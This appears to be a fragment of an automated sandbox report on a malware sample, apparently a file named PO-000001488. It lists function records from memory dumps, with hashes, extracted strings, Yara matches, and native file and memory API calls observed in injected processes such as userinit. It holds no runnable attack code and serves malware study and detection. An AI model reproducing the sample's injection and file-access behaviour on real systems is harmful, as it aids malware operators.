                                                      • Opcode Fuzzy Hash: aa97458d6092c39f1a225a12572c782ca8f0ce6d407fbc779da3c01aba610752
                                                      • Instruction Fuzzy Hash: 5451F4B5A40646AEDB20EE5DC89097FBFF8BF44200F44885AE4D6EF681E674DA00C770
                                                      Strings
                                                      • Execute=1, xrefs: 01544713
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01544725
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015446FC
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01544655
                                                      • ExecuteOptions, xrefs: 015446A0
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01544787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01544742
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: eebb323422904eb371951b8109a0e21761788e3305c4c8a944451843dd31414f
                                                      • Instruction ID: 74c2498aa8ab1d8cd795a21788d5c85d019b3ebdd593dda598d1dae989d098e7
                                                      • Opcode Fuzzy Hash: eebb323422904eb371951b8109a0e21761788e3305c4c8a944451843dd31414f
                                                      • Instruction Fuzzy Hash: 89514B3160020ABBEF12EAE8DC95FAD77A8BF58744F14009AD606AF1D1D770AA458F50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-$0$0
                                                      • API String ID: 1302938615-699404926
                                                      • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction ID: f5e176e961f0b6da425b7870111e6e4e95e77a4c474b9f3dadefdedc69d8df11
                                                      • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                      • Instruction Fuzzy Hash: 5081D170E0524A9EFF278E6CC8907FEBBB1BF55720F184A19D851AF299C7348840CB61
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$[$]:%u
                                                      • API String ID: 48624451-2819853543
                                                      • Opcode ID: 4df3156c523e70c7d0f669e880d08b1eff414b02bdc27d1676c782b1271fab48
                                                      • Instruction ID: e8786bc6c5ef11444cbc83e810c3bab9418f133a1d60c9a0c69fe5c39b74707d
                                                      • Opcode Fuzzy Hash: 4df3156c523e70c7d0f669e880d08b1eff414b02bdc27d1676c782b1271fab48
                                                      • Instruction Fuzzy Hash: 5921657AA0011AABDB11EF79CC40AEE7FF8FF54644F54012AE905E7244E730D911CBA1
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015402BD
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015402E7
                                                      • RTL: Re-Waiting, xrefs: 0154031E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                      • API String ID: 0-2474120054
                                                      • Opcode ID: 0dbd05da6ee4db4f93009731795933cc33feff24978a441c9dc4306e6e251094
                                                      • Instruction ID: 72ba8d594e570dbccb1e3aae0c4933d82d8ca7fd677fa2a5113966577b62e800
                                                      • Opcode Fuzzy Hash: 0dbd05da6ee4db4f93009731795933cc33feff24978a441c9dc4306e6e251094
                                                      • Instruction Fuzzy Hash: 7BE1B2316087429FE725CF28C884B5ABBE0BF84714F240A5EF6A58B3E1D774D849CB42
                                                      Strings
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01547B7F
                                                      • RTL: Resource at %p, xrefs: 01547B8E
                                                      • RTL: Re-Waiting, xrefs: 01547BAC
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 0-871070163
                                                      • Opcode ID: dafdbb0a5e4d2a9b47779506ff868ac1d989d88114b05a5608e7db7d8c47d03c
                                                      • Instruction ID: 807058155cd81d3a44174f106b8b8a3c69af269eac6b63c19e3b0557252c29b0
                                                      • Opcode Fuzzy Hash: dafdbb0a5e4d2a9b47779506ff868ac1d989d88114b05a5608e7db7d8c47d03c
                                                      • Instruction Fuzzy Hash: 6141D1353007039FD726DE69C880B6AB7E5FB98710F100A1EF9669F280EB71E8058B91
                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0154728C
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 015472A3
                                                      • RTL: Re-Waiting, xrefs: 015472C1
                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01547294
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-605551621
                                                      • Opcode ID: 246a0a955c6d90cf63a9b25c473ee9878eea87059dffc343666feb6d56c701e5
                                                      • Instruction ID: a63b01235db0345fa8c167f9d94fc83f02739ebc9e86db1ee72517f8d1716b09
                                                      • Opcode Fuzzy Hash: 246a0a955c6d90cf63a9b25c473ee9878eea87059dffc343666feb6d56c701e5
                                                      • Instruction Fuzzy Hash: 0541D035704203ABD721DE69CC81F6AB7A6FB98714F100A1AF955AF280DB71F94287E1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: %%%u$]:%u
                                                      • API String ID: 48624451-3050659472
                                                      • Opcode ID: db90db450ae29bc39fec1cc08a9a7e794e85230b118731486fa0049416ca49d2
                                                      • Instruction ID: 107506d1d61f036fb0fe57c0eb4cf3202bdf8afb1c4346a8631a2d7d116a8fd5
                                                      • Opcode Fuzzy Hash: db90db450ae29bc39fec1cc08a9a7e794e85230b118731486fa0049416ca49d2
                                                      • Instruction Fuzzy Hash: C6315476A002199FDB20DE2DCC50BEEBBF8FF54650F94455AE949E7240EF309A44CBA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: +$-
                                                      • API String ID: 1302938615-2137968064
                                                      • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction ID: c4743d285e126930926dd09acfa3ca83470034b349d5f8689e92f456643c011d
                                                      • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                      • Instruction Fuzzy Hash: 22919471E0020A9EFB26DF6DC8806BFBBE5BF48320F54461AE965EF2C8D73499408751
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $$@
                                                      • API String ID: 0-1194432280
                                                      • Opcode ID: 563d975ca398593017bffa70d123415f38ac73c782ba5bf847ce9d60c81d691c
                                                      • Instruction ID: 9aeca95fc6eea966c6af3190808e44f1d80aa36803d58e5230bb297310d15e39
                                                      • Opcode Fuzzy Hash: 563d975ca398593017bffa70d123415f38ac73c782ba5bf847ce9d60c81d691c
                                                      • Instruction Fuzzy Hash: 59811871D006699BDB31CF54CC54BEEBBB4AF58714F0441EAAA19BB290D7709E848FA0
                                                      APIs
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0155CFBD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014A0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_14a0000_PO-000001488.jbxd
                                                      Similarity
                                                      • API ID: CallFilterFunc@8
                                                      • String ID: @$@4Qw@4Qw
                                                      • API String ID: 4062629308-2383119779
                                                      • Opcode ID: 9d6096ce58fde0d5c1c3332b1a3578b2fcc92fb771b40011372052557c13c146
                                                      • Instruction ID: 50ca93421b75053aac0ab0ef921e2d322dca5992136350db1f0449ca82d97822
                                                      • Opcode Fuzzy Hash: 9d6096ce58fde0d5c1c3332b1a3578b2fcc92fb771b40011372052557c13c146
                                                      • Instruction Fuzzy Hash: A9418B72900219DFDB219FA9C890AADBBF8FF64B50F00452FE915DF264E7748901CB61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ){$-$/$1U$?b$D$E.$H$O2$SC$U$W$^$a.$c/$f?$h)$kP$m$p0$p{$s7$t$t$td$y$y $z${${*$5$8$:$?$c
                                                      • API String ID: 0-298092976
                                                      • Opcode ID: eef4c3cfc7834d10831a79b8691fe5d6420aa4485afa700d4920f4f5b418bf60
                                                      • Instruction ID: 6c396a713067ca54f1560a3e3c2e2de490656fe4a74c6183651540675ddae821
                                                      • Opcode Fuzzy Hash: eef4c3cfc7834d10831a79b8691fe5d6420aa4485afa700d4920f4f5b418bf60
                                                      • Instruction Fuzzy Hash: 5F52E4B0D45229CBEB64CF44C898BEDBBB2BB85308F5081D9C55DAB281DB755AC9CF40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$O$S$\$s
                                                      • API String ID: 0-3854637164
                                                      • Opcode ID: 9cfcdf914b61ef3ed95cfcdae33ecec8b7a31b1a1b335d31bf589f8acbe28d43
                                                      • Instruction ID: 5f031f4d3c1e9561d076212fb6f82ba5d502ed4da7c3f4c038f824beb55cecbc
                                                      • Opcode Fuzzy Hash: 9cfcdf914b61ef3ed95cfcdae33ecec8b7a31b1a1b335d31bf589f8acbe28d43
                                                      • Instruction Fuzzy Hash: 155195B2D01118ABDB10EF94DD48EFEB378EF54710F1481A9ED09A7140E7799B49CBA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                      • API String ID: 0-685823316
                                                      • Opcode ID: e4eb8dc9e5c81c7c901bad658f48c334343adf6db022fab614618d4ae02d1f43
                                                      • Instruction ID: 16a5384da49ef65d7197738c6677d36c7f336f357dca769d14d7f0ee83d9a1af
                                                      • Opcode Fuzzy Hash: e4eb8dc9e5c81c7c901bad658f48c334343adf6db022fab614618d4ae02d1f43
                                                      • Instruction Fuzzy Hash: A73161B1D50208AEDF50DFE4CC48FEEBBB9BF08304F108159E618A6180DBB55A488BA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $:$D$a$a$r$t$u$z
                                                      • API String ID: 0-186907745
                                                      • Opcode ID: ec9b9897f7163a701d5106b2e564a0e402b267a7bf93ad1974762814ec3f8c2d
                                                      • Instruction ID: a7430ab85f654047f18e3fa376be95544e37e65aeb34d60d9ee08516d88c1dd3
                                                      • Opcode Fuzzy Hash: ec9b9897f7163a701d5106b2e564a0e402b267a7bf93ad1974762814ec3f8c2d
                                                      • Instruction Fuzzy Hash: 5A11DB20D0C7CAD9DB12C7BC84186AEBF715F63224F0883C8D5E52A2D2D2795306CBA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$P$e$i$m$o$r$x
                                                      • API String ID: 0-620024284
                                                      • Opcode ID: bf23e1216f87e200f08eaf8ebb831cc8dc60731d7014df3265e7337b3257b76d
                                                      • Instruction ID: 6d17bac4a8b0e87bd4cfadf5d93c62bc1f24bf8f7f8fd9734fd385dc148172ba
                                                      • Opcode Fuzzy Hash: bf23e1216f87e200f08eaf8ebb831cc8dc60731d7014df3265e7337b3257b76d
                                                      • Instruction Fuzzy Hash: 844196B2900218B6DB25EFA0CD49FEE777CAF55300F008599E64DA7141EBB597498FB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$S$\$a$c$e$l
                                                      • API String ID: 0-3322591375
                                                      • Opcode ID: 19bcc4e951e5772f5930d50229d9bf60f4348b7375e7c0f8b8726fc3a4671f20
                                                      • Instruction ID: 30f3868398577f822ea9a53b6ea5fb34780b07c922e1b37aec9e27e74f3b778c
                                                      • Opcode Fuzzy Hash: 19bcc4e951e5772f5930d50229d9bf60f4348b7375e7c0f8b8726fc3a4671f20
                                                      • Instruction Fuzzy Hash: 984196B2D00218AACF10DFA4DC48FEEB7F8FF88704F01456AD919E7140E7755A498BA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: 3c3fd566526a92fd2bff1b4faa2b5858987c62c7b9b9b41eec45d7e0ac5e10ca
                                                      • Instruction ID: 2c30d6de9cd8127bfdfff02e19556548ce8bcdd95ea83d22ad84d99a6bb8f186
                                                      • Opcode Fuzzy Hash: 3c3fd566526a92fd2bff1b4faa2b5858987c62c7b9b9b41eec45d7e0ac5e10ca
                                                      • Instruction Fuzzy Hash: 6951D371A00704ABE734DFB4CD48FEBB7B8BF04715F04465AE91996180E7B4A984CBA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $T&>A$e$h$o
                                                      • API String ID: 0-3994059736
                                                      • Opcode ID: 125d89abd965c2c98acac57425acf91f9a6d0bb9cbdfe9b9eb11007d4a71eca9
                                                      • Instruction ID: d817471c37fd9a1a6f83dd559d34ee2e8979adfba5029c78a4528a6916df2e28
                                                      • Opcode Fuzzy Hash: 125d89abd965c2c98acac57425acf91f9a6d0bb9cbdfe9b9eb11007d4a71eca9
                                                      • Instruction Fuzzy Hash: 938165B2D012186ADB25DBA0CD89FFE737CFF48700F44859EE609A6040EB745B858FA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $T&>A$e$h$o
                                                      • API String ID: 0-3994059736
                                                      • Opcode ID: 49cb013864f90fb688126a6d3bd570505811592e06e67d484aa90b4e2445d929
                                                      • Instruction ID: 51fe93a7ffe9a3f68bc0fe382e6ab91395824b01b69b490e2f940b15a10be7d0
                                                      • Opcode Fuzzy Hash: 49cb013864f90fb688126a6d3bd570505811592e06e67d484aa90b4e2445d929
                                                      • Instruction Fuzzy Hash: 384134B1D0121CAADB14DBA4CD49FEE73B8EF48700F40859AE50DB7140EB745B848FA5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 31c28bb66233cbb4b922df6ff6b371e5dab3dd13a4c1d1567002b2aad9a613ab
                                                      • Instruction ID: 41eea6ee78b820197966db73c47f3131b84e128a5a239d28844e170b75b6efa3
                                                      • Opcode Fuzzy Hash: 31c28bb66233cbb4b922df6ff6b371e5dab3dd13a4c1d1567002b2aad9a613ab
                                                      • Instruction Fuzzy Hash: 28B12EB5A00308AFDB14DBA4CD84FEFB7F9BF88710F108558FA5997240D675AA41CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 9bc55577fe0098d8e862b2dd9f1b46922e35bdb03926d66b67aac0e1a8a92855
                                                      • Instruction ID: dab2413ea4097e1f3552b3b660fc7615359c1c8e61bb0eba0d7f5d62a90487b5
                                                      • Opcode Fuzzy Hash: 9bc55577fe0098d8e862b2dd9f1b46922e35bdb03926d66b67aac0e1a8a92855
                                                      • Instruction Fuzzy Hash: F7610BB5A00308AFDB54DFA4CC84FEFB7BDAF88714F108558E6599B244D771AA41CB60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 293888d9daf7b28e8e53f48785c6079b6609b0d6e8d7dc66e1690066b3604795
                                                      • Instruction ID: ed4c0078e21da74fc4f9653194261576a8a2a0ea7fe0789e260c675f7d7de42c
                                                      • Opcode Fuzzy Hash: 293888d9daf7b28e8e53f48785c6079b6609b0d6e8d7dc66e1690066b3604795
                                                      • Instruction Fuzzy Hash: 17413CB1A11118BAEB01EB94CD46FFF7B7CAF55704F004149FA05AA180DB756B0587B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 939cbb5074fc8eb57812949b050735189ade49cc3d405b7702ff03bad3a3b0ce
                                                      • Instruction ID: 56ab755cdc638859a95738a244018726fdbde4a3cdaefccd9cfa5034d0e62487
                                                      • Opcode Fuzzy Hash: 939cbb5074fc8eb57812949b050735189ade49cc3d405b7702ff03bad3a3b0ce
                                                      • Instruction Fuzzy Hash: 20314CB1A11218BBEB01EB94CD46FEF7B7CAF55704F004049FA05AA180EB75AB0587F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_57c0000_MpfhURuSBZcuS.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4$6$8$A
                                                      • API String ID: 0-2248624344
                                                      • Opcode ID: 54689a7d453c31f9c1a8d49184d9ad5117e9d9abb6d5444043b3a610d0a1d386
                                                      • Instruction ID: d3934009bd957c4ac8204050c0e43c8c929b99003715613259aa7425943f624c
                                                      • Opcode Fuzzy Hash: 54689a7d453c31f9c1a8d49184d9ad5117e9d9abb6d5444043b3a610d0a1d386
                                                      • Instruction Fuzzy Hash: 453141B1A10209BBDB14DFA4CD45FEE77B8EF48304F008159E904A7240EB75AA458BE5

                                                      Execution Graph

                                                      Execution Coverage:2.7%
                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                      Signature Coverage:2.2%
                                                      Total number of Nodes:464
                                                      Total number of Limit Nodes:74

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #o$,$,!$.$.DXd$0$1|$61$6T$@8$D4$E$J$T$Xd$ZW$b$f
                                                      • API String ID: 0-2960789933
                                                      • Opcode ID: b19bebff46af8e153ccb2d4897266fdbd8886ef31321bc33c71d44196ce172c8
                                                      • Instruction ID: acb217886ae590db4ecc0a3489f3dd6dcc4703cb15d87765c8ebc64c63d87a86
                                                      • Opcode Fuzzy Hash: b19bebff46af8e153ccb2d4897266fdbd8886ef31321bc33c71d44196ce172c8
                                                      • Instruction Fuzzy Hash: 31E1C2B0E0526DCFEB24CF44C994BEEBBB1BB46308F1081D9D1596B281D7B91A88DF51
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 00ABC374
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 00ABC3AF
                                                      • FindClose.KERNELBASE(?), ref: 00ABC3BA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: 66c96e6f90ef2f9e47d2401661692ba17a794f59cb98951b2a74a0c6821fe9ec
                                                      • Instruction ID: 73dd39ec105de132eb7108900bce614865b841b29876c535b4f11166adc2920c
                                                      • Opcode Fuzzy Hash: 66c96e6f90ef2f9e47d2401661692ba17a794f59cb98951b2a74a0c6821fe9ec
                                                      • Instruction Fuzzy Hash: DD3183B5A40308BBDB20EB64CD85FFF77BC9F44714F144559B908AB182DB70AA848BA0
                                                      APIs
                                                      • NtCreateFile.NTDLL(2888A750,?,?,?,?,?,?,?,?,?,?), ref: 00AC8E8E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 8263e9b9b3655f0d7f7f85571750a182001a6f476e1524a903f998bad7412ed5
                                                      • Instruction ID: 4fe866f6fe1a5fff6f9eba305058c3a974b80638143728afb750bb8b6eb2e295
                                                      • Opcode Fuzzy Hash: 8263e9b9b3655f0d7f7f85571750a182001a6f476e1524a903f998bad7412ed5
                                                      • Instruction Fuzzy Hash: DE31D3B5A01208AFCB14DF98D981EEEB7B9EF8C314F108209F919A7340D734A951CFA5
                                                      APIs
                                                      • NtReadFile.NTDLL(2888A750,?,?,?,?,?,?,?,?), ref: 00AC8FE9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: f9e2abaf3592445059f4fccfabe1212306f5964c21800777085ab5dbbfcdb515
                                                      • Instruction ID: f294725e5343ee6b9a750754d1a3c1790bc1b3d7afb19d56fe284641cc114d33
                                                      • Opcode Fuzzy Hash: f9e2abaf3592445059f4fccfabe1212306f5964c21800777085ab5dbbfcdb515
                                                      • Instruction Fuzzy Hash: 9131E5B5A00208AFDB14DF98D881EEFB7B9EF8C314F108219F919A7341D774A9518FA5
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(2888A750,?,00AC7CDF,00000000,00000004,00003000,?,?,?,?,?,00AC7CDF,00AB19EE,00AB19EE,00000000,?), ref: 00AC92D8
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_aa0000_userinit.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 9748e708b96aa18100ac35f0450ba1d82ff0ea418837c52caf31f50557a53c81
                                                      • Instruction ID: 42438409e396d3db223144ef6a12adfecf391f34ee64d31c27b8670ef6229999
